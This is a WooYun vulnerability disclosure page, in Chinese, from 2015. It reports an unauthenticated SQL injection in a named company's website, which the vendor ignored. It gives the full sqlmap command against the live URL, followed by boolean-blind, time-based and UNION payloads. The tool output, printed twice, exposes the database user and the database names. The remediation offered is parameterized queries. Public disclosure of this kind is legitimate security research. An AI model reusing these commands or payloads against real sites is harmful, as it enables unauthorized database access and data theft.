乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 细节已通知厂商并且等待厂商处理中 2015-09-22: 厂商已经主动忽略漏洞,细节向公众公开
存在一个mysql的注入漏洞,漏洞无需登录,可union查询,可快速脱裤
sqlmap.py -u "http://www.allyes.com/case/getinfo?id=11" -p id --current-user --current-db --dbssqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=11') AND 2789=2789 AND ('JBVT'='JBVT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=11') AND (SELECT * FROM (SELECT(SLEEP(5)))dUAw) AND ('aKnb'='aKnb Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=-9754') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7171,0x6c446271464262676355,0x7162766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[20:37:28] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.12[20:37:28] [INFO] fetching current usercurrent user: 'allyesweb@localhost'[20:37:28] [INFO] fetching current databasecurrent database: 'allyesweb'[20:37:28] [INFO] fetching database names[20:37:28] [INFO] the SQL query used returns 3 entries[20:37:28] [INFO] retrieved: information_schema[20:37:28] [INFO] retrieved: allyesweb[20:37:29] [INFO] retrieved: testavailable databases [3]:[*] allyesweb[*] information_schema[*] test
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=11') AND 2789=2789 AND ('JBVT'='JBVT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=11') AND (SELECT * FROM (SELECT(SLEEP(5)))dUAw) AND ('aKnb'='aKnb Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: id=-9754') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7171,0x6c446271464262676355,0x7162766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[20:37:28] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.12[20:37:28] [INFO] fetching current usercurrent user: 'allyesweb@localhost'[20:37:28] [INFO] fetching current databasecurrent database: 'allyesweb'[20:37:28] [INFO] fetching database names[20:37:28] [INFO] the SQL query used returns 3 entries[20:37:28] [INFO] retrieved: information_schema[20:37:28] [INFO] retrieved: allyesweb[20:37:29] [INFO] retrieved: testavailable databases [3]:[*] allyesweb[*] information_schema[*] test
参数化查询
危害等级:无影响厂商忽略
忽略时间:2015-09-22 10:40
漏洞Rank:4 (WooYun评价)
暂无